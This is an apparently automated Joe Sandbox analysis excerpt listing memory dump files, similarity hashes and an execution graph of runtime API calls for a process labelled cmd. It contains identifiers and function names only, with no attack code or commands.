        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: FileType
        • String ID: \\.\pipe\
        • API String ID: 3081899298-91387939
        • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
        • Instruction ID: 790ee70fc367c304df1276190cb9ebe91656f4e22da251b20a4d0bd8fc0ec299
        • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
        • Instruction Fuzzy Hash: 84513C26218BA8E1E6A48EA9E45CBAA6760F3B4F40F051227ED4D4BB5DDA35C5B0C740
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: ErrorFileLastWrite
        • String ID: U
        • API String ID: 442123175-4171548499
        • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
        • Instruction ID: b925385357e6037b0b301eb57f746ae8fa0c59d49f197392b68a4625b644e259
        • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
        • Instruction Fuzzy Hash: DD412D72625A54D6D710CF65E408B99B7A0F398784F401222FE4D8B758DB38D4A1CB40
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: ErrorFileLastWrite
        • String ID: U
        • API String ID: 442123175-4171548499
        • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
        • Instruction ID: 63d033d6e0a27e95c581628fad4c4eab81bd45c4f0f87a17bed408bc7cae38b6
        • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
        • Instruction Fuzzy Hash: E5410B72625794D6EB10CFA5E408B99B7B0F358784F405222FE4D8B758EB38C5A1C740
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: ExceptionFileHeaderRaise
        • String ID: csm
        • API String ID: 2573137834-1018135373
        • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
        • Instruction ID: 3fea4e51061c95c08e1ad11e21629e2917d3b3f52f60923e8bfc5f99f8269196
        • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
        • Instruction Fuzzy Hash: 08115B32214B9492EB248B15F40864AB7E1F798B84F685221EF8D0BBA4DF3DC5A1CB00
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: ExceptionFileHeaderRaise
        • String ID: csm
        • API String ID: 2573137834-1018135373
        • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
        • Instruction ID: aa5bfbff80aec522ba400115a2cb2349a74d7478659afd9a13be9c210e938443
        • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
        • Instruction Fuzzy Hash: 3E115B32214B9492EB648B15F408649B7E1F798B84F585221EECD0BB64DF3DC5B1CB00
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: Heap$Process$AllocFree
        • String ID:
        • API String ID: 756756679-0
        • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
        • Instruction ID: 2a196670cf31b06c99ee828d7a83fa157223dd105698c79baaecdf347339c1d1
        • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
        • Instruction Fuzzy Hash: 9511E121601B98D5EE01CBA6A40C55973A0F7C8FC0F585225EF4E57364DF39D4A2C700
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: Heap$Process$AllocFree
        • String ID:
        • API String ID: 756756679-0
        • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
        • Instruction ID: fb47aec53ea757b7efc87c7fa91f3dfcaa956d26eeac13730b77036eac60bf6f
        • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
        • Instruction Fuzzy Hash: A611D625601F98D1EA15CFA6E40855977B0F7D8FC0F585226EE4E57724DF39D6A2C300
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: Heap$AllocProcess
        • String ID:
        • API String ID: 1617791916-0
        • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
        • Instruction ID: 216cfa3702de209d908f991dfa534a9d5f2861c106f9e31024633cb093c584c2
        • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
        • Instruction Fuzzy Hash: A4E03931602618EAE7148BA2D80878936E1EB98B05F549124CE090B350EF7E94E9AB40
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: Heap$AllocProcess
        • String ID:
        • API String ID: 1617791916-0
        • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
        • Instruction ID: 834e0ecae5f25fd690bbb72ec068ec5b19c38b435709a9f0bd38bca57035ff8e
        • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
        • Instruction Fuzzy Hash: F8E06D31601618EAE7148FA2D80C78936E1FB98F05F44D124CD090B350EF7E85F98740
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: Heap$AllocProcess
        • String ID:
        • API String ID: 1617791916-0
        • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
        • Instruction ID: 06b3879994855eb41b2211279e74e83476b3f556fb56989caf67414040a01dba
        • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
        • Instruction Fuzzy Hash: EBE0ED71611518EBE7189BA2D80869976A1FB98B15F549125CE090B310EE3994F9AA10
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: Heap$AllocProcess
        • String ID:
        • API String ID: 1617791916-0
        • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
        • Instruction ID: e4c527ce9d1da941725debe6ccd72ff2bb48d6fbccbc7cef7b6fd0167d5fbaee
        • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
        • Instruction Fuzzy Hash: 33E01271611618EBE7189FA2DC0879976E1FB9CF15F449125CD090B310EE7D85F9D710

        Execution Graph

        Execution Coverage:1.5%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:0%
        Total number of Nodes:1524
        Total number of Limit Nodes:10
        execution_graph 15256 13f08e6ae42 15269 13f08e69324 15256->15269 15258 13f08e6ae93 RaiseException 15260 13f08e6aeba 15258->15260 15259 13f08e6ae4f __CxxCallCatchBlock 15259->15258 15272 13f08e69978 15260->15272 15262 13f08e6aeeb __CxxCallCatchBlock 15263 13f08e69324 __CxxCallCatchBlock 9 API calls 15262->15263 15264 13f08e6aefe 15263->15264 15265 13f08e69324 __CxxCallCatchBlock 9 API calls 15264->15265 15267 13f08e6af07 15265->15267 15283 13f08e69340 15269->15283 15271 13f08e6932d 15271->15259 15273 13f08e69324 __CxxCallCatchBlock 9 API calls 15272->15273 15274 13f08e6998a 15273->15274 15275 13f08e69324 __CxxCallCatchBlock 9 API calls 15274->15275 15276 13f08e699c5 15274->15276 15277 13f08e69995 15275->15277 15277->15276 15278 13f08e69324 __CxxCallCatchBlock 9 API calls 15277->15278 15279 13f08e699b6 15278->15279 15279->15262 15280 13f08e68ff8 15279->15280 15281 13f08e69324 __CxxCallCatchBlock 9 API calls 15280->15281 15282 13f08e69006 15281->15282 15282->15262 15284 13f08e6935f GetLastError 15283->15284 15285 13f08e69358 15283->15285 15295 13f08e69c8c 15284->15295 15285->15271 15299 13f08e69aac 15295->15299 15300 13f08e69b96 TlsGetValue 15299->15300 15301 13f08e69af0 __vcrt_FlsAlloc 15299->15301 15301->15300 15302 13f08e69b1e LoadLibraryExW 15301->15302 15303 13f08e69bdd GetProcAddress 15301->15303 15307 13f08e69b61 LoadLibraryExW 15301->15307 15304 13f08e69b3f GetLastError 15302->15304 15305 13f08e69bbd 15302->15305 15303->15300 15304->15301 15305->15303 15306 13f08e69bd4 FreeLibrary 15305->15306 15306->15303 15307->15301 15307->15305 17104 13f08e6ff40 17105 13f08e6ff4b 17104->17105 17113 13f08e72c24 17105->17113 17126 13f08e6c558 EnterCriticalSection 17113->17126 17857 13f08e6f440 GetProcessHeap 15360 13f08e6824c 15361 13f08e68270 __scrt_release_startup_lock 15360->15361 15362 13f08e6b581 15361->15362 15365 13f08e6cb10 15361->15365 15364 13f08e6b5aa 15366 13f08e6cb59 GetLastError 15365->15366 15371 13f08e6cb2f __std_exception_copy 15365->15371 15369 13f08e6cb6c 15366->15369 15367 13f08e6cb8a SetLastError 15368 13f08e6cb54 15367->15368 15368->15364 15369->15367 15370 13f08e6cb87 15369->15370 15372 13f08e6c940 _invalid_parameter_noinfo 11 API calls 15369->15372 15370->15367 15371->15368 15374 13f08e6c940 GetLastError 15371->15374 15372->15370 15375 13f08e6c966 15374->15375 15376 13f08e6c96c SetLastError 15375->15376 15392 13f08e6d220 15375->15392 15377 13f08e6c9e5 15376->15377 15377->15368 15380 13f08e6c9a5 FlsSetValue 15383 13f08e6c9b1 FlsSetValue 15380->15383 15384 13f08e6c9c8 15380->15384 15381 13f08e6c995 FlsSetValue 15399 13f08e6d2a0 15381->15399 15386 13f08e6d2a0 __free_lconv_num 7 API calls 15383->15386 15405 13f08e6c758 15384->15405 15389 13f08e6c9c6 SetLastError 15386->15389 15389->15377 15398 13f08e6d231 _invalid_parameter_noinfo 15392->15398 15393 13f08e6d282 15413 13f08e6d1f4 15393->15413 15394 13f08e6d266 HeapAlloc 15396 13f08e6c987 15394->15396 15394->15398 15396->15380 15396->15381 15398->15393 15398->15394 15410 13f08e6b470 15398->15410 15400 13f08e6d2a5 HeapFree 15399->15400 15401 13f08e6c9a3 15399->15401 15400->15401 15402 13f08e6d2c0 GetLastError 15400->15402 15401->15376 15403 13f08e6d2cd __free_lconv_num 15402->15403 15404 13f08e6d1f4 __std_exception_copy 11 API calls 15403->15404 15404->15401 15422 13f08e6c630 15405->15422 15416 13f08e6b4c0 15410->15416 15414 13f08e6cb10 __std_exception_copy 13 API calls 15413->15414 15415 13f08e6d1fd 15414->15415 15415->15396 15421 13f08e6c558 EnterCriticalSection 15416->15421 15434 13f08e6c558 EnterCriticalSection 15422->15434 17859 13f08e74848 17862 13f08e6904c 17859->17862 17863 13f08e69076 17862->17863 17864 13f08e69064 17862->17864 17866 13f08e69324 __CxxCallCatchBlock 9 API calls 17863->17866 17864->17863 17865 13f08e6906c 17864->17865 17867 13f08e69074 17865->17867 17869 13f08e69324 __CxxCallCatchBlock 9 API calls 17865->17869 17868 13f08e6907b 17866->17868 17868->17867 17871 13f08e69324 __CxxCallCatchBlock 9 API calls 17868->17871 17870 13f08e6909b 17869->17870 17872 13f08e69324 __CxxCallCatchBlock 9 API calls 17870->17872 17871->17867 17873 13f08e690a8 17872->17873 17874 13f08e6c2f4 14 API calls 17873->17874 17875 13f08e690b1 17874->17875 17876 13f08e6c2f4 14 API calls 17875->17876 17877 13f08e690bd 17876->17877 18418 13f08e6ad48 18419 13f08e69324 __CxxCallCatchBlock 9 API calls 18418->18419 18420 13f08e6ad7d 18419->18420 18421 13f08e69324 __CxxCallCatchBlock 9 API calls 18420->18421 18422 13f08e6ad8b __except_validate_context_record 18421->18422 18423 13f08e69324 __CxxCallCatchBlock 9 API calls 18422->18423 18424 13f08e6adcf 18423->18424 18425 13f08e69324 __CxxCallCatchBlock 9 API calls 18424->18425 18426 13f08e6add8 18425->18426 18427 13f08e69324 __CxxCallCatchBlock 9 API calls 18426->18427 18428 13f08e6ade1 18427->18428 18441 13f08e6993c 18428->18441 18431 13f08e69324 __CxxCallCatchBlock 9 API calls 18432 13f08e6ae11 __CxxCallCatchBlock 18431->18432 18433 13f08e69978 __CxxCallCatchBlock 9 API calls 18432->18433 18438 13f08e6aec2 18433->18438 18434 13f08e6aeeb __CxxCallCatchBlock 18435 13f08e69324 __CxxCallCatchBlock 9 API calls 18434->18435 18436 13f08e6aefe 18435->18436 18437 13f08e69324 __CxxCallCatchBlock 9 API calls 18436->18437 18439 13f08e6af07 18437->18439 18438->18434 18440 13f08e68ff8 __CxxCallCatchBlock 9 API calls 18438->18440 18440->18434 18442 13f08e69324 __CxxCallCatchBlock 9 API calls 18441->18442 18443 13f08e6994d 18442->18443 18444 13f08e69958 18443->18444 18445 13f08e69324 __CxxCallCatchBlock 9 API calls 18443->18445 18446 13f08e69324 __CxxCallCatchBlock 9 API calls 18444->18446 18445->18444 18447 13f08e69969 18446->18447 18447->18431 18447->18432 15827 13f08e62e54 15829 13f08e62ea8 15827->15829 15828 13f08e62ec3 15829->15828 15831 13f08e637f4 15829->15831 15832 13f08e6388a 15831->15832 15834 13f08e63819 15831->15834 15832->15828 15833 13f08e63f88 StrCmpNIW 15833->15834 15834->15832 15834->15833 15835 13f08e61e08 StrCmpIW StrCmpW 15834->15835 15835->15834 18448 13f08e7494f 18449 13f08e7495e 18448->18449 18450 13f08e74968 18448->18450 18452 13f08e6c5ac LeaveCriticalSection 18449->18452 17883 13f08e7485e 17884 13f08e69324 __CxxCallCatchBlock 9 API calls 17883->17884 17885 13f08e7486c 17884->17885 17886 13f08e74877 17885->17886 17887 13f08e69324 __CxxCallCatchBlock 9 API calls 17885->17887 17887->17886 15845 13f08e6d658 15846 13f08e6d67d 15845->15846 15850 13f08e6d694 15845->15850 15847 13f08e6d1f4 __std_exception_copy 13 API calls 15846->15847 15849 13f08e6d682 15847->15849 15848 13f08e6d724 15980 13f08e6bb54 15848->15980 15878 13f08e6d04c 15849->15878 15850->15848 15860 13f08e6d7b6 15850->15860 15862 13f08e6d6da 15850->15862 15881 13f08e6d894 15850->15881 15943 13f08e6da18 15850->15943 15852 13f08e6d68d 15856 13f08e6d784 15859 13f08e6d2a0 __free_lconv_num 13 API calls 15856->15859 15858 13f08e6d836 15861 13f08e6d2a0 __free_lconv_num 13 API calls 15858->15861 15863 13f08e6d78b 15859->15863 15865 13f08e6d6fd 15860->15865 15869 13f08e6d2a0 __free_lconv_num 13 API calls 15860->15869 15864 13f08e6d841 15861->15864 15862->15865 15870 13f08e6d2a0 __free_lconv_num 13 API calls 15862->15870 15863->15865 15871 13f08e6d2a0 __free_lconv_num 13 API calls 15863->15871 15868 13f08e6d85a 15864->15868 15872 13f08e6d2a0 __free_lconv_num 13 API calls 15864->15872 15867 13f08e6d2a0 __free_lconv_num 13 API calls 15865->15867 15866 13f08e6d7d7 15866->15858 15866->15866 15875 13f08e6d87c 15866->15875 15986 13f08e70eb8 15866->15986 15867->15852 15873 13f08e6d2a0 __free_lconv_num 13 API calls 15868->15873 15869->15860 15870->15862 15871->15863 15872->15864 15873->15852 15995 13f08e6d06c IsProcessorFeaturePresent 15875->15995 15999 13f08e6cef8 15878->15999 15882 13f08e6d8c2 15881->15882 15882->15882 15883 13f08e6d8de 15882->15883 15884 13f08e6d220 _invalid_parameter_noinfo 13 API calls 15882->15884 15883->15850 15885 13f08e6d90d 15884->15885 15886 13f08e6d926 15885->15886 15887 13f08e70eb8 38 API calls 15885->15887 15888 13f08e70eb8 38 API calls 15886->15888 15900 13f08e6d9fc 15886->15900 15887->15886 15889 13f08e6d943 15888->15889 15891 13f08e6d962 15889->15891 15892 13f08e6d98d 15889->15892 15889->15900 15910 13f08e6d97f 15889->15910 15890 13f08e6d06c _invalid_parameter_noinfo 17 API calls 15898 13f08e6da17 15890->15898 15893 13f08e6d220 _invalid_parameter_noinfo 13 API calls 15891->15893 15906 13f08e6d977 15892->15906 16073 13f08e6eee0 15892->16073 15899 13f08e6d96d 15893->15899 15894 13f08e6d2a0 __free_lconv_num 13 API calls 15894->15900 15896 13f08e6d2a0 __free_lconv_num 13 API calls 15896->15910 15897 13f08e6da7a 15907 13f08e6da8c 15897->15907 15913 13f08e6daa1 15897->15913 15898->15897 16082 13f08e713d8 15898->16082 15902 13f08e6d2a0 __free_lconv_num 13 API calls 15899->15902 15900->15890 15901 13f08e6d9b5 15903 13f08e6d9d0 15901->15903 15904 13f08e6d9ba 15901->15904 15902->15906 15909 13f08e6d2a0 __free_lconv_num 13 API calls 15903->15909 15908 13f08e6d2a0 __free_lconv_num 13 API calls 15904->15908 15906->15896 15906->15910 15911 13f08e6d894 52 API calls 15907->15911 15908->15906 15909->15910 15910->15894 15912 13f08e6da9c 15911->15912 16155 13f08e68070 15912->16155 16091 13f08e6dd78 15913->16091 15918 13f08e6db1a 16103 13f08e6d30c 15918->16103 15922 13f08e6dba8 15923 13f08e6d894 52 API calls 15922->15923 15925 13f08e6dbb8 15923->15925 15924 13f08e6dd78 14 API calls 15931 13f08e6dbd2 15924->15931 15925->15912 15926 13f08e6d2a0 __free_lconv_num 13 API calls 15925->15926 15926->15912 15927 13f08e6f198 9 API calls 15927->15931 15929 13f08e6d894 52 API calls 15929->15931 15930 13f08e6dcc8 FindNextFileW 15930->15931 15932 13f08e6dce0 15930->15932 15931->15924 15931->15927 15931->15929 15931->15930 15933 13f08e6d2a0 13 API calls __free_lconv_num 15931->15933 15934 13f08e6dd2a 15931->15934 16125 13f08e6d4ac 15931->16125 15935 13f08e6dd0c FindClose 15932->15935 16147 13f08e70b20 15932->16147 15933->15931 15936 13f08e6dd38 FindClose 15934->15936 15939 13f08e6d2a0 __free_lconv_num 13 API calls 15934->15939 15935->15912 15938 13f08e6dd1c 15935->15938 15936->15912 15940 13f08e6dd48 15936->15940 15941 13f08e6d2a0 __free_lconv_num 13 API calls 15938->15941 15939->15936 15942 13f08e6d2a0 __free_lconv_num 13 API calls 15940->15942 15941->15912 15942->15912 15944 13f08e6da7a 15943->15944 15945 13f08e6da58 15943->15945 15947 13f08e6da8c 15944->15947 15949 13f08e6daa1 15944->15949 15945->15944 15946 13f08e713d8 38 API calls 15945->15946 15946->15945 15948 13f08e6d894 56 API calls 15947->15948 15974 13f08e6da9c 15948->15974 15950 13f08e6dd78 14 API calls 15949->15950 15953 13f08e6db0b 15950->15953 15951 13f08e68070 _invalid_parameter_noinfo 8 API calls 15952 13f08e6dd64 15951->15952 15952->15850 15954 13f08e6db1a 15953->15954 15955 13f08e6f198 9 API calls 15953->15955 15956 13f08e6d30c 16 API calls 15954->15956 15955->15954 15957 13f08e6db7b FindFirstFileExW 15956->15957 15958 13f08e6dbd2 15957->15958 15959 13f08e6dba8 15957->15959 15961 13f08e6dd78 14 API calls 15958->15961 15964 13f08e6f198 9 API calls 15958->15964 15965 13f08e6d4ac 16 API calls 15958->15965 15966 13f08e6d894 56 API calls 15958->15966 15967 13f08e6dcc8 FindNextFileW 15958->15967 15969 13f08e6d2a0 13 API calls __free_lconv_num 15958->15969 15970 13f08e6dd2a 15958->15970 15960 13f08e6d894 56 API calls 15959->15960 15962 13f08e6dbb8 15960->15962 15961->15958 15963 13f08e6d2a0 __free_lconv_num 13 API calls 15962->15963 15962->15974 15963->15974 15964->15958 15965->15958 15966->15958 15967->15958 15968 13f08e6dce0 15967->15968 15971 13f08e6dd0c FindClose 15968->15971 15973 13f08e70b20 38 API calls 15968->15973 15969->15958 15972 13f08e6dd38 FindClose 15970->15972 15976 13f08e6d2a0 __free_lconv_num 13 API calls 15970->15976 15971->15974 15975 13f08e6dd1c 15971->15975 15972->15974 15977 13f08e6dd48 15972->15977 15973->15971 15974->15951 15978 13f08e6d2a0 __free_lconv_num 13 API calls 15975->15978 15976->15972 15979 13f08e6d2a0 __free_lconv_num 13 API calls 15977->15979 15978->15974 15979->15974 15981 13f08e6bb6c 15980->15981 15985 13f08e6bba4 15980->15985 15982 13f08e6d220 _invalid_parameter_noinfo 13 API calls 15981->15982 15981->15985 15983 13f08e6bb9a 15982->15983 15984 13f08e6d2a0 __free_lconv_num 13 API calls 15983->15984 15984->15985 15985->15856 15985->15866 15991 13f08e70ed5 15986->15991 15987 13f08e70eda 15988 13f08e70ef0 15987->15988 15989 13f08e6d1f4 __std_exception_copy 13 API calls 15987->15989 15988->15866 15990 13f08e70ee4 15989->15990 15992 13f08e6d04c _invalid_parameter_noinfo 38 API calls 15990->15992 15991->15987 15991->15988 15993 13f08e70f24 15991->15993 15992->15988 15993->15988 15994 13f08e6d1f4 __std_exception_copy 13 API calls 15993->15994 15994->15990 15996 13f08e6d07f 15995->15996 16228 13f08e6cd80 15996->16228 16000 13f08e6cf23 15999->16000 16007 13f08e6cf94 16000->16007 16002 13f08e6cf4a 16003 13f08e6cf6d 16002->16003 16017 13f08e6c3e0 16002->16017 16005 13f08e6c3e0 _invalid_parameter_noinfo 17 API calls 16003->16005 16006 13f08e6cf82 16003->16006 16005->16006 16006->15852 16030 13f08e6ccc8 16007->16030 16012 13f08e6d06c _invalid_parameter_noinfo 17 API calls 16014 13f08e6d04a 16012->16014 16013 13f08e6cfcf 16013->16002 16015 13f08e6cef8 _invalid_parameter_noinfo 38 API calls 16014->16015 16016 13f08e6d065 16015->16016 16016->16002 16018 13f08e6c3ef GetLastError 16017->16018 16019 13f08e6c438 16017->16019 16020 13f08e6c404 16018->16020 16019->16003 16021 13f08e6cba0 _invalid_parameter_noinfo 14 API calls 16020->16021 16022 13f08e6c41e SetLastError 16021->16022 16022->16019 16023 13f08e6c441 16022->16023 16024 13f08e6c3e0 